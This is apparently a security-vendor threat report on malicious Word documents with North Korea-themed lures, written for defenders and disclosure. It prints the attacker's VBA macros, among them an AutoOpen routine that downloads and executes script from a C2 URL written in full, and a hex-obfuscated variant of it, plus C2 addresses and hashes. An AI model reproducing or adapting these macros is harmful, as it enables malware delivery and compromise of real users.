Discovery of Continuous Distribution of North Korea-related Malicious Word Files

The ASEC analysis team has discovered the continuous distribution of malicious Word files containing North Korea-related materials. The macro code inside the Word file is similar to the one that was introduced in the previous post, <‘Malicious Word File Disguised as ‘Purchase and Sales Agreement for Export-bound Gold Bars’>.

The filenames of the recently discovered files are as follows:

  • Analysis of Chinese Military Strategy and Its Prospect.doc (Discovered on October 25th)
  • Questionnaire-December Broadcast.doc (Discovered on October 28th)
  • Questionnaire-July Broadcast.docm (Discovered on October 1st)
  • KF Oceania Next Generation Policy Expert Network_Presentation Notice (2).doc (Discovered on October 7th)
  • 210813_Business Contact (Cyber Security).doc (Discovered in August)

Note that many of the discovered Word files contain North Korea-related material in their filenames or bodies.

[Analysis of Chinese Military Strategy and Its Prospect.doc]

‘Analysis of Chinese Military Strategy and Its Prospect.doc’ file has macro included, and the macro has a document protection removal-related code. The set password is 1qaz2wsx, which is also the password used for the file shown in <Malicious Word Documents with External Link of North Korea Related Materials>. It thus appears that this file was created by the same attacker.

Sub Present()
    On Error Resume Next
    Weed "pic", "1qaz2wsx"
    For Mode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = Mode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

 

When the user runs the Word file and enables the macro, the malicious macro is executed automatically via AutoOpen(). This macro executes the protection removal code of the document shown above and downloads additional data from hxxp://sarvice.medianewsonline[.]com/file/uplload/list.php?query=1, then saves it to 1589989024.xml. The macro code that performs the malicious behavior is as follows:

Sub AutoOpen()
    On Error Resume Next
    Present
    wnd.Save
    cnt = "On Error Resume Next:Set mx = CreateObject(""Microsoft.XMLHTTP""):mx.open ""GET"", ""http://sarvice.medianewsonline.com/file/uplload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
    pth = GenPlace() & "\1589989024.xml"
    ResContent pth, cnt
    Perform ("wscript.exe //e:vbscript //b " & pth)
End Sub

[Questionnaire-December Broadcast.doc]

The macro code in ‘Questionnaire-December Broadcast.doc’ is a little more obfuscated than the one in the previous Word file.

Sub ytoqdggdrsetyaeorw(bret)
fn = FreeFile
ui = isqgsilwwutr("677265656e6761726465") & isqgsilwwutr("6e2e6b6b6b32342e6b722f6d6f62696c652f736b696e2f626f6172642f67616c6c6572792f6572726f722f757064617465")
rp = Environ(isqgsilwwutr("617070") & isqgsilwwutr("64617461")) & isqgsilwwutr("5c4d6963726f736f66745c4f66666963655c76657273696f6e2e") & isqgsilwwutr("786d6c")
Open rp For Output As #fn
hs = isqgsilwwutr("4f6e") & isqgsilwwutr("204572726f7220526573756d65204e6578743a536574206f7073743d4372656174654f626a65637428")
mids = isqgsilwwutr("4d53584d4c322e536572766572584d4c") & isqgsilwwutr("485454502e362e30")
hs = hs & """" & mids & """"
mids = isqgsilwwutr("293a6f7073742e6f70") & isqgsilwwutr("656e20")
hs = hs & mids & """"
mids = isqgsilwwutr("474554")
hs = hs & mids & """," & """"
mids = isqgsilwwutr("687474703a2f2f78") & isqgsilwwutr("78782f6c6973742e7068703f71756572793d31")
mids = Replace(mids, isqgsilwwutr("787878"), ui)
<omitted>

This macro performs the same malicious behavior as ‘Chinese Military Strategy and Its Prospect.doc,’ and the URL that it connects to is as follows:

  • hxxp://greengarden.kkk24.kr/mobile/skin/board/gallery/error/update/list.php?query=1

Also, although the Word file of ‘Questionnaire-December Broadcast.doc’ was not collected, the file with a similar filename, ‘Questionnaire-July Broadcast.docm,’ contains North Korea-related material (see Figure 1).

[Questionnaire-July Broadcast.docm]

Figure 1. File of Questionnaire-July Broadcast.docm

Connection URL: hxxp://sendlucky.scienceontheweb.net/ben/chads/list.php?query=1

The following are the C2 addresses discovered in a similar macro file.

  • hxxp://smgfishing.co[.]kr/theme/basic/mobile/skin/new/basic/list.php?query=1
  • hxxp://tinytalk.mygamesonline[.]org/web/fell/list.php?query=1
  • hxxp://sendlucky.scienceontheweb[.]net/ben/chads/list.php?query=1
  • hxxp://bipaf[.]org/bbs/zipcode/style/css/list.php?query=1

As shown above, North Korea-related Word files containing malicious macro are consistently being distributed with various filenames and content. As such types of files contain the actual information upon running the macro, it is difficult for users to recognize that these files are malicious, which requires extra caution.

AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.

[File Detection]

Downloader/DOC.Generic.S1649

[IOC]

  • c359152a98e5fa5ac422d317a789a955
  • hxxp://sarvice.medianewsonline[.]com/file/uplload/list.php?query=1
  • hxxp://greengarden.kkk24.kr/mobile/skin/board/gallery/error/update/list.php?query=1
  • hxxp://smgfishing.co[.]kr/theme/basic/mobile/skin/new/basic/list.php?query=1
  • hxxp://tinytalk.mygamesonline[.]org/web/fell/list.php?query=1
  • hxxp://sendlucky.scienceontheweb[.]net/ben/chads/list.php?query=1
  • hxxp://bipaf[.]org/bbs/zipcode/style/css/list.php?query=1

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

TAGGED AS:APT, NORTH KOREA, WORD MACRO

5 1 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments